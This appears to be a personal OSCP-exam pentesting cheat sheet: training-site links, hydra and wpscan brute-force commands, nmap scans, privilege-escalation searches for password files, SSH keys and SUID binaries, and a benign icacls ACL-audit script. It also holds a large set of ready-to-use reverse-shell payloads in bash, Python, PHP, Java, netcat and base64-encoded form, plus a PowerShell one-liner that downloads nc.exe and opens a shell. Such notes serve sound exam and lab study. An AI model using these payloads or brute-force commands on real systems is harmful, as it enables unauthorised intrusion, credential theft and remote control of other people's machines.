Official exam guide
Official exam report
pentest.ws: note taking
Burp Suite: tool for exploring web security. Configure browser with Burp Suite
OWASP juice box: OWASP security trainings
[hack this site]
[over the wire]
[pwnable.kr/xyz]
[hack the box]
[cybrary]
[Google Gruyere]
[game of hacks]
[bWAPP]
[Webgoat]
hashcat: password recovery tool
feroxbuster: powerful forced-browsing tool (alternatives: gobuster, dirb)
AutoRecon: multi-threaded network reconnaissance tool which performs automated enumeration of services
explainshell: explains command lines
SecLists: a collection of multiple types of lists used during security assessments, collected in one place
Reverse Shell Generator: online reverse shell generator
hacktricks
CyberChef: a web app for encryption, encoding, compression and data analysis.
Microsoft Security Response Center
linPEAS: Understanding the tools/scripts you use in a Pentest
Official Exam Guide
2022 Official OSCP Prep Guide
2022/1/11 Active Directory
2022/8/6 OSCP Bonus Points Update
Make sure there is no maximum number of login attempts (account lockout) before brute-forcing. Check this manually first.
IMAP
hydra -L usernames.txt -P wordlists.txt -s 143 -f 192.168.0.1 imap
PostgreSQL
hydra -l <username> -P /usr/share/wordlists/rockyou.txt 192.168.121.60 postgres
for a normal connection
psql -U <username> -p 5432 -h <hostname or ip>
HTTP Basic Authentication
hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.0.1 http-get / # "/" is the default path
JSON
# Check Content-Type, Accept, Origin, X-Requested-With, Referer, CSRF tokens and Cookies
# use cURL first to find out which headers are required
hydra -l admin -P ~/Documents/rockyou.txt test.com https-post-form "/login:{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:F=401:H=Origin\: https\://test.com:H=Accept\: application/json, text/plain, */*:H=Content-Type\: application/json;charset=utf-8"
build a wordlist for password crackers from a site's content
cewl -d 4 https://192.168.0.1 -w /tmp/wordlists.txt --with-numbers
# -d depth
# --with-numbers: Accept words with numbers in as well as just letters
scan a subnet
# Note: a timing template that is too fast can affect the results
nmap -T3 192.168.10.0/24
scan all TCP ports and services
nmap -Pn -p- -sC -sV -T4 <target ip>
optimizing performance
nmap -p- --min-rate 1000 <target ip>
# --min-rate <number>: Send packets no slower than <number> per second
# and then specific port
nmap -p <target port> -sC -sV <target ip>
# UDP
nmap -p- --min-rate 1000 -sU <target ip>
ncat
ncat -e /bin/bash <attacker ip> <attacker port>
python3 (file)
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<attacker ip>",<attacker port>))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])
python (file)
#!/usr/bin/env python
import os
import sys
try:
    os.system("python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attacker ip>\",<attacker port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")\'")
except:
    print('ERROR...')
    sys.exit(0)
When passing the command as a parameter to an exploit script fails, embed it in the source instead
python
command = "echo '/bin/bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && /bin/bash /tmp/revshell.sh"
java
String[] cmdline = { "sh", "-c", "echo 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && bash /tmp/revshell.sh" };
Runtime.getRuntime().exec(cmdline);
php (file)
<?php system("nc -e /bin/bash <attacker ip> <attacker port>"); ?>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'");?>
for some special cases
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> <attacker port> >/tmp/f
base64
echo 'bash -c "bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1"' | base64
echo -n <base64 command string> | base64 -d | bash
# echo -n cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEyNy4wLjAuMSIsODApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJw== | base64 -d | bash
crontab -l
ls -alh /etc/cron.* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
unprivileged Linux process snooping: pspy
Finding the application (WordPress)
wpscan --url http://192.168.0.1/
Enumerating valid usernames
wpscan --url http://192.168.0.1/ --enumerate u1-1000
Enumerating themes
wpscan --url http://192.168.0.1/ -e at
curl -k -s http://192.168.0.1/wp-content/themes/ | html2text
curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Enumerating plugins
wpscan --url http://192.168.0.1/ -e ap
wpscan --url http://192.168.0.1/ -e ap --plugins-detection aggressive --api-token <api_key> -t 20 --verbose
# --api-token: display vulnerability data (not always necessary); register a user and get the API key from the official wpscan website
curl -k -s http://192.168.0.1/wp-content/plugins/ | html2text
curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Brute-force attack
wpscan --url http://192.168.0.1/ --passwords /usr/share/wordlists/rockyou.txt --max-threads 50 --usernames admin
SSL peer certificate or SSH remote key was not OK
wpscan --url https://192.168.0.1/ --disable-tls-checks
📂 LFI
a file to read on Windows
C:\Windows\System32\drivers\etc\hosts
git clone https://github.com/Tib3rius/AutoRecon.git
cd AutoRecon
sudo python3 autorecon.py <target IP> --dirbuster.wordlist "" # skip directory busting to speed up results
find subdomains
wfuzz -H 'Host: FUZZ.test.com' -u http://test.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 407
# --hw: hide responses with this word count
need to authenticate
# php example
wfuzz -H 'Cookie: PHPSESSID=<fill in the PHPSESSID>' -u https://<target ip>/<folder>/?FUZZ= -w <wordlist> --hw <value>
post requests
wfuzz -z file,<wordlist> -d "username=admin&password=FUZZ" --hc 302 <url>
# -d: POST data
# -z file,<wordlist>: payload source
# --hc: hide responses with this status code
create a new password list from a known password (hashcat rules)
echo -n "passwordstring" > /tmp/oldPass
# -n: do not output the trailing newline
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout /tmp/oldPass > /tmp/newPassList.txt
MD5
REM Try -m 0 (MD5)
.\hashcat.exe -a 0 -m 0 .\hash .\rockyou.txt
Typical site folders
/srv/http/
/var/www/html/
avoid permission denied messages
find / -name '*kali*' 2>&-
find / -writable -type f 2>/dev/null | grep -v "/proc/"
find files containing specific text
find / -type f \( -iname \*.php -o -iname \*.config -o -iname \*.conf -o -iname \*.ini -o -iname \*.txt \) -exec grep -i 'password\|passwd' {} \; -print 2>&-
finding SUID executables
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
find ssh key
find / -type f -name 'id_rsa*' 2>&-
which groups the user belongs to and what those groups can access
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),122(bluetooth),134(scanner),143(kaboxer)
find / -group <name> 2>/dev/null
# find / -group wireshark 2>/dev/null
upgrade reverse shell in Kali
# 1. switch to bash; on Kali, start the listener
bash
nc -nlvp <local port>
# 2. spawn a PTY with script
/usr/bin/script -qc /bin/bash /dev/null
# 3. alternative
script -c "/bin/bash -i" /dev/null
# chsh - change your login shell
chsh -s /bin/bash
# full pathnames of valid login shells
cat /etc/shells
# 1. finding the current shell
echo $0
# 2. finding the current shell
/proc/self/exe --version
icacls /t: performs the operation on all specified files in the given directory and its subdirectories.
icacls <directory> /t
Remarks
A sequence of simple rights:
F - Full access
M - Modify access
RX - Read and execute access
R - Read-only access
W - Write-only access
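An added example (not from the original notes) showing how the icacls output described above can be parsed and audited: it reports every entry that gives a low-privileged principal (Everyone, BUILTIN\Users, Authenticated Users) write-level rights, which is what a hardening review or a privilege-escalation check looks for. The sample output is constructed; the rule that paths contain no spaces is an assumption stated in the code.

```python
import re
from typing import List, Tuple

# Constructed sample of `icacls C:\App /t` output (not captured from a real host).
SAMPLE_ICACLS = r"""C:\App BUILTIN\Administrators:(OI)(CI)(F)
       NT AUTHORITY\SYSTEM:(OI)(CI)(F)
       BUILTIN\Users:(OI)(CI)(RX)
C:\App\bin\svc.exe BUILTIN\Administrators:(F)
                   Everyone:(I)(M)
C:\App\logs BUILTIN\Users:(OI)(CI)(W)
            Everyone:(DENY)(F)

Successfully processed 3 files; Failed processing 0 files
"""

# Principals that every interactive or authenticated user maps to (compared lowercase).
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users",
            r"nt authority\interactive"}
# Simple rights (F, M, W, D) plus specific rights that allow changing the object,
# its DACL or its owner.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO"}

# "<path> <principal>:(flag)(flag)..." or "   <principal>:(flag)..." on continuation lines
ACE_RE = re.compile(r"^(?P<left>.*?):(?P<perms>(?:\([^)]*\))+)\s*$")

def parse_icacls(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (path, principal, flags) for every ACE in icacls output.

    Assumption: paths contain no spaces, so on the first line of a file entry the
    path is the text before the first space and the principal is the rest.
    Continuation lines are indented and carry only principal:flags.
    """
    entries, path = [], ""
    for line in text.splitlines():
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the trailing summary line
        left = m.group("left")
        if line[0].isspace():
            principal = left.strip()
        else:
            path, principal = left.split(" ", 1)
        flags = [t for grp in re.findall(r"\(([^)]*)\)", m.group("perms"))
                 for t in grp.split(",")]
        entries.append((path, principal, flags))
    return entries

def weak_aces(entries) -> List[Tuple[str, str, List[str]]]:
    """Allow-ACEs that give a low-privileged principal any write-level right."""
    findings = []
    for path, principal, flags in entries:
        if "DENY" in flags or principal.lower() not in LOW_PRIV:
            continue
        granted = sorted(set(flags) & WRITE_RIGHTS)
        if granted:
            findings.append((path, principal, granted))
    return findings

if __name__ == "__main__":
    for path, who, rights in weak_aces(parse_icacls(SAMPLE_ICACLS)):
        print(f"{path}: {who} has {','.join(rights)}")
```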
download file
certutil -f -urlcache <URL> <local filename>
powershell -Command "Invoke-WebRequest '<URL>' -OutFile <filename>"
powershell -Command "Invoke-WebRequest \"<URL>\" -OutFile <filename>"
get file hash
certutil -hashfile <file> MD5
find files containing specific text
findstr /si password C:\*.xml C:\*.ini C:\*.txt C:\*.config C:\*.conf
run a script with the execution policy bypassed
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\Windows\Temp\xxx.ps1
zip
Compress-Archive -Path C:\Users\guest\Desktop\dist -DestinationPath C:\Users\guest\Desktop\dist.zip
unzip
Expand-Archive -LiteralPath C:\Users\guest\Desktop\dist.zip -DestinationPath C:\Users\guest\Desktop
reverse shell
powershell -c "IEX(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.100/nc.exe', 'C:\users\XXX\desktop\nc.exe');C:\users\XXX\desktop\nc.exe 192.168.0.100 80 -e cmd"
disable the Firefox address-bar search function so that typed hostnames are not sent to a search engine; makes testing easier
type "about:config" in the address bar
Accept the warning
Search for "keyword.enabled" and change it to false
header-modification add-on (or use Burp Suite)
https://addons.mozilla.org/en-US/firefox/addon/simple-modify-header/
C:\Windows\SysWOW64
C:\Windows\System32
C:\Windows\System32\drivers\etc\hosts